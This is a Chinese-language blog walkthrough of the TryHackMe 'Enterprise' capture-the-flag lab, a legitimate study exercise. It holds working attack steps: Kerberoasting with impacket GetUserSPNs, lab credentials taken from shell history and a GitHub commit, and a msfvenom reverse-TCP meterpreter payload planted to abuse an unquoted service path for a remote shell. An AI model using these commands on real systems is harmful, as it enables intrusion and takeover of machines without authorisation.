扫描打点
啊西八,以后必须先用
--min-rate 10000 -p-扫一遍
找到个域名
enterprise.thm0以及lab.enterprise.thm扫到个好玩的,虽然没什么用:
80端口应该是没东西了,看看远处别的端口吧:445
Users共享不让碰,就碰一下,连进去看到:
这里可以访问
LAB-ADMIN/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/Consolehost_history.txt这个类似
.bash_history
拿到账密
replication:101RepAdmin123!!7990是一个登录页面,但上面写着已经转移到
github了
我超,供应链打击搜了下还真有:
https://github.com/Enterprise-THM
看了下真是完美的供应链:
在
enterprise-thm组织中只有一人,其仓库中只有一份脚本文件,查看commit历史直接得到账密:
nik:ToastyBoi!但是登录框需要邮箱
k8s:Kerberoasting攻击前几天运动会上看cx佬的博客正好谈到这点,等回头有时间去把域学习的靶机做完好了
所以这里要引入一个新工具
impacket-GetUserSPNs,其用于找出和普通用户账户关联的SPN具体的细则我会在之后的一篇文章里详写的。。大概
1
python3 /opt/impacket/examples/GetUserSPNs.py -dc-ip 10.10.116.149 lab.enterprise.thm/nik:ToastyBoi! -request -outputfile hash.txt
拿到了
bitbucket用户的hash,爆出来:bitbucket:littleredbucket然后用
evil-winrm好像登不上,因为有rdp直接远程桌面了1
xfreerdp /u:bitbucket /p:littleredbucket /v:10.10.116.149 /dynamic-resolution
windows无引号服务路径提权呃,这里
linpeas.sh幽默报错了,找不到为什么大概会扫出来这个:
生成一个
Zero.exe作为反弹shell,放在/Zero Tier用于劫持服务执行的文件:1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.64.234 LPORT=1234 -e x86/shikata_ga_nai -f exe -o Zero.exe
同时
msf开监听,在Windows端那里:1
Start-Service -name "zerotieroneservice"
然后发现断掉的很快,用
windows/manage/migrate设一下自动转移进程提权完成
THM打靶日寄25-Enterprise
- 本文链接: http://noone40404.github.io/2024/11/19/THM打靶日寄25:Enterprise/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!